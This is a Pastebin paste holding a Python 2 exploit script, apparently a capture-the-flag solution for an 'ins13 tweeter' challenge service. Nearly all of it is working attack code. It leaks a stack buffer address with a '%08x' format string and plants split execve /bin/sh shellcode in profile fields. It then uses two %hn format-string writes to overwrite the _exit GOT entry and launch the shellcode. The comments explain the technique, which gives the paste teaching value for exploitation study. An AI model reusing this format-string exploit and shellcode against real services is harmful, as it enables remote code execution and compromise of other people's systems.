API tools faq
paste
Advertisement
Guest User

#ins13 tweeter

a guest
Mar 23rd, 2013
298
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.37 KB | None | 0 0
raw download clone embed print report diff
  1. # -*- coding: utf-8 -*-
  2. import socket
  3. import struct
  4.  
  5. target_ip = "serv"
  6. target_port = 12345
  7.  
  8. '''
  9. len of first part of the shellcode should be < 20
  10. we use \xeb\x01 (jmp+1) to join the two parts
  11. of the shellcode
  12.  
  13. for this chall a bind shellcode is more appropriate than
  14. a /bin/sh
  15.  
  16. xor    %eax,%eax
  17. push   %eax
  18. push   $0x68732f2f
  19. push   $0x6e69622f
  20. mov    %esp,%ebx
  21. push   %eax
  22. push   %ebx
  23. mov    %esp,%ecx
  24. mov    $0xb,%al
  25. int    $0x80
  26. char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
  27.           "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
  28. '''
  29.  
  30. sc1 = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xeb\x01"
  31. sc2 = "\x89\xe1\xb0\x0b\xcd\x80"
  32.  
  33. sc_status = "AAAA" + "\n"
  34.  
  35. sk = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
  36. sk.connect((target_ip, target_port))
  37.  
  38. # welcome
  39. print sk.recv(4096)
  40.  
  41. # send nick
  42. nick = "jojo\n"
  43. sk.send(nick)
  44. print sk.recv(4096)
  45.  
  46. # retrieve buffer addr :
  47. tweet = "\x32"+"\n"
  48. sk.send(tweet)
  49. print sk.recv(4096)
  50.  
  51. # mem leak
  52. mem_leak = "%08x\n"
  53. sk.send(mem_leak)
  54. data = sk.recv(4096)
  55.  
  56. addr_pos = data.find("\x0a\x0a\x0a")
  57.  
  58. addr_buf_str = data[addr_pos+3:addr_pos+3+8].decode("hex")
  59.  
  60. addr_buff = struct.unpack(">I", addr_buf_str)[0]
  61. print "buffer_addr = " + hex(addr_buff)
  62.  
  63. # we put our shellcode divided in two parts
  64. # edit profile
  65. cmd = "\x31"+"\n"
  66. sk.send(cmd)
  67. print sk.recv(4096)
  68.  
  69. # send nick sc
  70. sk.send(sc1)
  71. print sk.recv(4096)
  72.  
  73. # send website sc
  74. sk.send(sc2)
  75. print sk.recv(4096)
  76.  
  77. # send status sc
  78. sk.send(sc_status)
  79. print sk.recv(4096)
  80.  
  81. tweet = "\x32"+"\n"
  82. sk.send(tweet)
  83. print sk.recv(4096)
  84.  
  85. tweet = "\x32"+"\n"
  86. sk.send(tweet)
  87. print sk.recv(4096)
  88.  
  89. addr_high = addr_buff >> 16
  90. addr_low = addr_buff & 0xFFFF
  91.  
  92. print "addr_high = " + hex(addr_high)
  93. print "addr_low = " + hex(addr_low)
  94.  
  95. # send fmt_string
  96. # use twice printf format string
  97. # HIGH(@_exit) = 0x8049bfe
  98. # LOW(@_exit) = 0x8049bfc
  99. # rewrite _exit with addr_buff
  100. fmt_string = "aa" + struct.pack("<I", 0x8049bfc) + "%" + str(addr_low-6) + "c%5$hn\n"
  101. sk.send(fmt_string)
  102. print sk.recv(4096)
  103. print data
  104. tweet = "\x32"+"\n"
  105. sk.send(tweet)
  106. print sk.recv(4096)
  107. fmt_string = "aa" + struct.pack("<I", 0x8049bfe) + "%" + str(addr_high-6) + "c%5$hn\n"
  108. sk.send(fmt_string)
  109. print sk.recv(4096)
  110.  
  111. print "launch shellcode -> call _exit"
  112.  
  113. tweet = "\x33"+"\n"
  114. sk.send(tweet)
  115. print sk.recv(4096)
  116.  
  117. sk.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!